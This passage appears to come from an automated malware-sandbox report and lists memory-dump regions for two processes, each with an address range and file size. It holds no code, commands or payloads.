                                                            10.8MB

                                                          • memory/4392-88-0x00007FF97AAF3000-0x00007FF97AAF5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/4996-57-0x00007FF98B880000-0x00007FF98B8AD000-memory.dmp

                                                            Filesize

                                                            180KB

                                                          • memory/4996-50-0x00007FF993440000-0x00007FF99344F000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/4996-212-0x00007FF9854A0000-0x00007FF9854D3000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/4996-87-0x00007FF97BF40000-0x00007FF97C0B7000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/4996-85-0x00007FF98B220000-0x00007FF98B243000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-86-0x00007FF97C190000-0x00007FF97C2AC000-memory.dmp

                                                            Filesize

                                                            1.1MB

                                                          • memory/4996-80-0x00007FF98B960000-0x00007FF98B96D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/4996-78-0x00007FF9900C0000-0x00007FF9900D4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4996-72-0x00007FF97C5E0000-0x00007FF97CBC9000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/4996-75-0x00007FF97B780000-0x00007FF97BCA2000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/4996-287-0x00007FF97BCB0000-0x00007FF97BD7D000-memory.dmp

                                                            Filesize

                                                            820KB

                                                          • memory/4996-76-0x00007FF98C010000-0x00007FF98C033000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-301-0x00007FF97B780000-0x00007FF97BCA2000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/4996-74-0x00000117ACC20000-0x00000117AD142000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/4996-73-0x00007FF97BCB0000-0x00007FF97BD7D000-memory.dmp

                                                            Filesize

                                                            820KB

                                                          • memory/4996-68-0x00007FF9854A0000-0x00007FF9854D3000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/4996-355-0x00007FF9900C0000-0x00007FF9900D4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4996-64-0x00007FF98B140000-0x00007FF98B159000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4996-62-0x00007FF97BF40000-0x00007FF97C0B7000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/4996-60-0x00007FF98B220000-0x00007FF98B243000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-216-0x00000117ACC20000-0x00000117AD142000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/4996-58-0x00007FF98B250000-0x00007FF98B269000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4996-383-0x00007FF97C190000-0x00007FF97C2AC000-memory.dmp

                                                            Filesize

                                                            1.1MB

                                                          • memory/4996-90-0x00007FF98B140000-0x00007FF98B159000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4996-66-0x00007FF98BB30000-0x00007FF98BB3D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/4996-369-0x00007FF97C5E0000-0x00007FF97CBC9000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/4996-370-0x00007FF98C010000-0x00007FF98C033000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-31-0x00007FF98C010000-0x00007FF98C033000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-395-0x00007FF97C5E0000-0x00007FF97CBC9000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/4996-401-0x00007FF97BF40000-0x00007FF97C0B7000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/4996-422-0x00000117ACC20000-0x00000117AD142000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/4996-421-0x00007FF98B960000-0x00007FF98B96D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/4996-420-0x00007FF9900C0000-0x00007FF9900D4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4996-419-0x00007FF97BCB0000-0x00007FF97BD7D000-memory.dmp

                                                            Filesize

                                                            820KB

                                                          • memory/4996-418-0x00007FF98BB30000-0x00007FF98BB3D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/4996-417-0x00007FF98B140000-0x00007FF98B159000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4996-416-0x00007FF9854A0000-0x00007FF9854D3000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/4996-415-0x00007FF98B220000-0x00007FF98B243000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-414-0x00007FF98B250000-0x00007FF98B269000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/4996-413-0x00007FF98B880000-0x00007FF98B8AD000-memory.dmp

                                                            Filesize

                                                            180KB

                                                          • memory/4996-412-0x00007FF993440000-0x00007FF99344F000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/4996-411-0x00007FF98C010000-0x00007FF98C033000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/4996-410-0x00007FF97B780000-0x00007FF97BCA2000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/4996-409-0x00007FF97C190000-0x00007FF97C2AC000-memory.dmp

                                                            Filesize

                                                            1.1MB

                                                          • memory/4996-375-0x00007FF97BF40000-0x00007FF97C0B7000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/4996-26-0x00007FF97C5E0000-0x00007FF97CBC9000-memory.dmp

                                                            Filesize

                                                            5.9MB